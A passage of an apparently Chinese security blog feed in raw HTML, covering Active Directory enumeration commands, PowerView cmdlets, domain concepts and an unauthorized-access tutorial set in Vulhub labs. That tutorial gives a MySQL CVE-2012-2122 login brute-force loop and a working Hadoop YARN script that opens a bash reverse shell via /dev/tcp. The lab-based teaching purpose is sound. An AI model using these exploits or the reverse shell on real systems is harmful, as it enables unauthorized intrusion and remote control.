material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">方法一:net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain controllers</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#这里查询结果后面会多一个 $ </span></span><span class="line"><span style="color: #BABED8">方法二:nltest </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">DCLIST:</span><span style="color: #82AAFF">xie.com</span></span><span class="line"><span style="color: #BABED8">方法三:net time </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span></span><span class="line"><span style="color: #BABED8">方法四:nslookup </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">type</span><span style="color: #89DDFF">=</span><span style="color: #BABED8">srv _ldap._tcp</span></span><span class="line"><span style="color: #BABED8">方法五:查看DNS服务器的地址,一般DNS服务器的IP就是域控的地址</span></span><span class="line"><span style="color: #BABED8">方法六:netdom query pdc </span><span style="color: #676E95; font-style: italic">#该命令只能在域控上执行</span></span><span class="line"><span style="color: #BABED8">方法七:dsquery server </span><span style="color: #676E95; font-style: italic">#该命令只能在域控上执行</span></span></code></pre></div></li></ul><h5 id="利用PowerSploit"><a href="#利用PowerSploit" class="headerlink" title="利用PowerSploit"></a>利用PowerSploit</h5><ul><li><p>PowerShell 常用的执行权限共有四种</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">Restricted:默认设置,不允许执行任何脚本。</span></span><span class="line"><span style="color: #FFCB6B">Allsigned:只能运行经过证书验证的脚本。</span></span><span class="line"><span style="color: #FFCB6B">Unrestricted:权限最高,可以执行任意脚本。</span></span><span class="line"><span style="color: #FFCB6B">RemoteSigned:本地脚本无限制,但是对来自网络的脚本必须经过签名。</span></span></code></pre></div><p>在 PowerShell 中输入“Get-ExecutionPolicy”,可以看到当前权限<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20112615.png?raw=true"></p></li><li><p>使用<strong>PowerSploit</strong>的<strong>PowerView</strong>脚本</p><ul><li><p>导入脚本</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">Import-Module</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">.</span><span style="color: #BABED8">\P</span><span style="color: #C3E88D">owerView.ps1</span></span></code></pre></div></li><li><p>功能:</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"></span><span class="line"><span style="color: #FFCB6B">Get-NetDomain</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取当前用户所在的域名称。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetUser</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">返回所有用户的详细信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetDomainController</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取所有域控制器。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetComputer</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取所有域内机器的详细信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetOU</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取域中的</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">OU</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetGroup</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取所有域内组和组成员信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetFileServer</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">根据</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">SPN</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取当前域使用的文件服务器。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetShare</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取当前域内所有网络共享。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetSession</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取在指定服务器存在的会话信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetRDPSession</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取在指定服务器存在的远程连接信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetProcess</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取远程主机的进程信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-UserEvent</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取指定用户的日志信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-ADObject</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取活动目录的对象信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetGPO</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取域所有组策略对象。</span></span><span class="line"><span style="color: #FFCB6B">Get-DomainPolicy</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取域默认或域控制器策略。</span></span><span class="line"><span style="color: #FFCB6B">Invoke-UserHunter</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">用于获取域用户登录计算机及该用户是否有本地管理权限。</span></span></code></pre></div></li></ul></li></ul>]]></content>
<summary type="html"><h2 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h2><h3 id="一-收集本机信息"><a href="#一-收集本机信息" class="headerlink" </summary>
</entry>
<entry>
<title>内网安全-基本概念</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5.html</id>
<published>2024-04-10T07:41:44.000Z</published>
<updated>2024-04-11T13:22:59.623Z</updated>
<content type="html"><![CDATA[<h2 id="内网基本概念"><a href="#内网基本概念" class="headerlink" title="内网基本概念"></a>内网基本概念</h2><h4 id="局域网"><a href="#局域网" class="headerlink" title="局域网"></a>局域网</h4><p>又称内网, 是指在某一区域内由多台计算机互联成的计算机组。</p><h4 id="工作组"><a href="#工作组" class="headerlink" title="工作组"></a>工作组</h4><p><strong>工作组(Work Group)就像一个可以自由进入和退出的社团</strong>,方便同组的计算机互相访问。没有集中管理作用,所有计算机都是<strong>对等的</strong>。</p><ul><li>在一个网络内,可能有成百上千台电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可想而知会有多么乱。</li><li>为了解决这一问题,早在Windows 9x/NT/2008就引用了“<strong>工作组</strong>”这个概念,将不同的电脑一般按功能分别列入不同的组中,如财务部的电脑都列入“财务部”工作组中,人事部的电脑都列入“人事部”工作组中。</li><li>你要访问某个部门的资源,就在“网上邻居”里找到那个部门的工作组名,双击就可以看到那个部门的电脑了。</li></ul><h4 id="域环境"><a href="#域环境" class="headerlink" title="域环境"></a>域环境</h4><p><strong>域(Domain)是一个有安全边界的计算机集合</strong>。可以简单的把域理解成升级版的工作组,但有一个严格的集中管理控制机制。</p><ul><li>与工作组的“松散会员制”有所不同,“域”是一个相对严格的组织。“域”指的是服务器控制网络上的计算机能否加入的计算机组合。</li><li>实行严格的管理对网络安全是非常必要的。在对等网模式下,任何一台电脑只要接入网络,就可以访问共享资源。尽管对等网络上的共享文件可以加访问密码,但是非常容易被破解。在由Windows 9x构成的对等网中,<strong>数据是非常不安全的</strong>。</li><li><em>在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的<strong>门卫</strong>一样,称为“<strong>域控制器(Domain Controller,简写为DC)</strong>”。“域控制器”中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息不正确,域控制器就拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,只能以对等网用户的方式访问Windows共享出来的资源,这样就一定程度上<strong>保护</strong>了网络上的资源</em></li><li>想把一台电脑加入域,仅仅使它和服务器在“网上邻居”能够相互看到是远远不够的,必须要由网络管理员进行把这台电脑加入域的相关操作。</li></ul><h4 id="域控制器-DC"><a href="#域控制器-DC" class="headerlink" title="域控制器-DC"></a>域控制器-DC</h4><p><strong>域控制器(Domain Controller,DC)相当于一个单位的门禁系统。DC中存在由这个域的账户、密码、属于这个域的计算机等信息构成的数据库</strong>。</p><p><strong>DC是整个域的通信枢纽。</strong></p><ul><li>一般情况下,域控制器集成了DNS服务,可以解析域内的计算机名称(基于TCP/IP),解决了工作组环境不同网段计算机不能使用计算机名互访的问题</li></ul><h4 id="活动目录-AD"><a href="#活动目录-AD" class="headerlink" title="活动目录-AD"></a>活动目录-AD</h4><p><strong>活动目录(Active Directory,AD)</strong>是指域环境中提供目录服务的组件</p><p>在目录中存储的信息可以是用户,组,计算机,共享资源,打印机,联系人等信息。目录服务可以帮助用户快速准确地从目录中找到需要的信息服务。</p><ul><li><p>活动目录主要提供的功能:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>账号集中管理:所有账号存储在服务器中,方便执行命令。</p><p>软件集中管理:统一推送软件,安装网络打印机。</p><p>增强安全性:统一部署杀毒软件,病毒扫描任务,集中管理计算机权限,统一制定用户密码策略等。</p></blockquote></li></ul><p>如果内网中的一台计算机上安装了AD,它就变成了DC(用于存储AD库的计算机)。</p><ul><li>DC的本质是一台计算机,AD的本质是提供目录服务的组件。</li></ul><h4 id="安全域的划分"><a href="#安全域的划分" class="headerlink" title="安全域的划分"></a>安全域的划分</h4><p>将一组安全等级相同的计算机划入同一个网段内, 在网络边界上通过防火墙来实现对其他安全域的NACL(网络访问控制策略), <strong>使得其风险最小化</strong>。</p><p><strong>一般安全域划分为:DMZ和内网。</strong></p><ul><li><p><strong>DMZ(Demilitarized Zone 非军事化区)称为隔离区。 为了解决安装防火墙后外部网络不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区。</strong></p><p>DMZ不能访问内网,DMZ不能访问外网(此策略有例外,如mail服务)。</p></li><li><p><strong>内网又可以划分为:办公区和核心区。</strong></p><p>办公区会安装防病毒软件、主机入侵检测产品(HIDS)等,运维使用堡垒机(跳板机)来统一管理用户的登陆行为。</p></li></ul><h4 id="域的分类"><a href="#域的分类" class="headerlink" title="域的分类"></a>域的分类</h4><ul><li><p>单域</p><p>例如主公司和子公司都独自形成了一个域环境,称为单域,由此延伸出<strong>父域和子域</strong>。</p></li><li><p>父域和子域</p><p>父域可以管理子域。</p></li><li><p>域树和域森林</p><p>域的框架结构,很多分支形成了域森林。</p></li></ul><h4 id="内网常用命令"><a href="#内网常用命令" class="headerlink" title="内网常用命令"></a>内网常用命令</h4><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>net user ——> 本机用户列表<br>net localhroup administrators ——> 本机管理员[通常含有域用户]<br>net user /domain ——> 查询域用户<br>net group /domain ——> 查询域里面的工作组<br>net group “domain admins” /domain ——> 查询域管理员用户组<br>net localgroup administrators /domain ——> 登录本机的域管理员<br>net localgroup administrators workgroup\user001 /add —–>域用户添加到本机<br>net group “Domain controllers” ——-> 查看域控制器(如果有多台)<br>ipconfig /all ——> 查询本机IP段,所在域等<br>net view ——> 查询同一域内机器列表<br>net view /domain ——> 查询域列表<br>net view /domain:domainname —–> 查看workgroup域中计算机列表</p></blockquote><h4 id="内网渗透基本流程"><a href="#内网渗透基本流程" class="headerlink" title="内网渗透基本流程"></a>内网渗透基本流程</h4><ol><li><em>信息收集</em></li><li><em>权限获取</em></li><li><em>横向移动</em></li><li><em>权限维持</em></li><li><em>痕迹消除</em></li></ol>]]></content>
<summary type="html"><h2 id="内网基本概念"><a href="#内网基本概念" class="headerlink" title="内网基本概念"></a>内网基本概念</h2><h4 id="局域网"><a href="#局域网" class="headerlink" title="局域网</summary>
</entry>
<entry>
<title>未授权访问</title>
<link href="https://myprefer.github.io/post/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.html"/>
<id>https://myprefer.github.io/post/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.html</id>
<published>2024-03-26T07:47:00.000Z</published>
<updated>2024-03-26T15:09:50.816Z</updated>
<content type="html"><![CDATA[<h3 id="漏洞简述"><a href="#漏洞简述" class="headerlink" title="漏洞简述"></a>漏洞简述</h3><h4 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h4><ul><li>未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作。</li></ul><h4 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h4><ul><li>泄露用户信息,系统信息</li><li>某些服务和系统中,未授权访问还可以执行系统命令,操作系统文件,导致系统的整体安全遭到破坏</li></ul><h3 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="漏洞发现"></a>漏洞发现</h3><h5 id="判断服务开放"><a href="#判断服务开放" class="headerlink" title="判断服务开放"></a>判断服务开放</h5><ul><li>Nmap端口扫描</li><li>组合猜测</li></ul><h5 id="判断服务类型"><a href="#判断服务类型" class="headerlink" title="判断服务类型"></a>判断服务类型</h5><ul><li>数据库</li><li>文件传输</li><li>远程控制</li><li>数据通信</li></ul><h3 id="漏洞实例"><a href="#漏洞实例" class="headerlink" title="漏洞实例"></a>漏洞实例</h3><h4 id="MySQL"><a href="#MySQL" class="headerlink" title="MySQL"></a>MySQL</h4><ul><li><p>环境:<a href="https://vulhub.org/#/environments/mysql/CVE-2012-2122/">Mysql 身份认证绕过漏洞(CVE-2012-2122)</a></p></li><li><p>原理:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说<strong>只要知道用户名</strong>,不断尝试就能够<strong>直接登入</strong>SQL数据库。</p></blockquote></li><li><p>利用:</p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #F78C6C">for</span><span style="color: #BABED8"> i </span><span style="color: #F78C6C">in</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">`</span><span style="color: #C3E88D">seq 1 1000</span><span style="color: #89DDFF">`</span><span style="color: #BABED8">; do mysql </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">uroot </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">pwrong </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">h your</span><span style="color: #89DDFF">-</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">P3306 ; done</span></span></code></pre></div></li></ul><h4 id="Hadoop"><a href="#Hadoop" class="headerlink" title="Hadoop"></a>Hadoop</h4><ul><li><p>环境:<a href="https://vulhub.org/#/environments/hadoop/unauthorized-yarn/">Vulhub - Docker-Compose file for vulnerability environment</a></p></li><li><p>原理:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>负责对资源进行同一管理调度的ReasourceManager组件的UI管理界面开放在8080/8088端口,攻击者<strong>无需认证</strong>即可通过REST API部署任务来<strong>执行任意命令</strong>,最终可完全控制集群中所有的机器。</p></blockquote></li><li><p>脚本:</p><div class="language-python"><button title="Copy code" class="copy"></button><span class="lang">python</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">#!/usr/bin/env python</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF; font-style: italic">import</span><span style="color: #BABED8"> requests</span></span><span class="line"></span><span class="line"><span style="color: #BABED8">target </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">http://127.0.0.1:8088/</span><span style="color: #89DDFF">'</span></span><span class="line"><span style="color: #BABED8">lhost </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">192.168.0.1</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic"># put your local host ip here, and listen at port 9999</span></span><span class="line"></span><span class="line"><span style="color: #BABED8">url </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> target </span><span style="color: #89DDFF">+</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">ws/v1/cluster/apps/new-application</span><span style="color: #89DDFF">'</span></span><span class="line"><span style="color: #BABED8">resp </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> requests</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">post</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">url</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #BABED8">app_id </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> resp</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">json</span><span style="color: #89DDFF">()[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">application-id</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]</span></span><span class="line"><span style="color: #BABED8">url </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> target </span><span style="color: #89DDFF">+</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">ws/v1/cluster/apps</span><span style="color: #89DDFF">'</span></span><span class="line"><span style="color: #BABED8">data </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">application-id</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> app_id</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">application-name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">get-shell</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">am-container-spec</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">commands</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">command</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">/bin/bash -i >& /dev/tcp/</span><span style="color: #F78C6C">%s</span><span style="color: #C3E88D">/9999 0>&1</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">%</span><span style="color: #BABED8"> lhost</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">},</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">},</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">application-type</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">YARN</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8">requests</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">post</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">url</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF"> </span><span style="color: #BABED8; font-style: italic">json</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">data</span><span style="color: #89DDFF">)</span></span><span class="line"></span></code></pre></div></li></ul><h4 id="Redis"><a href="#Redis" class="headerlink" 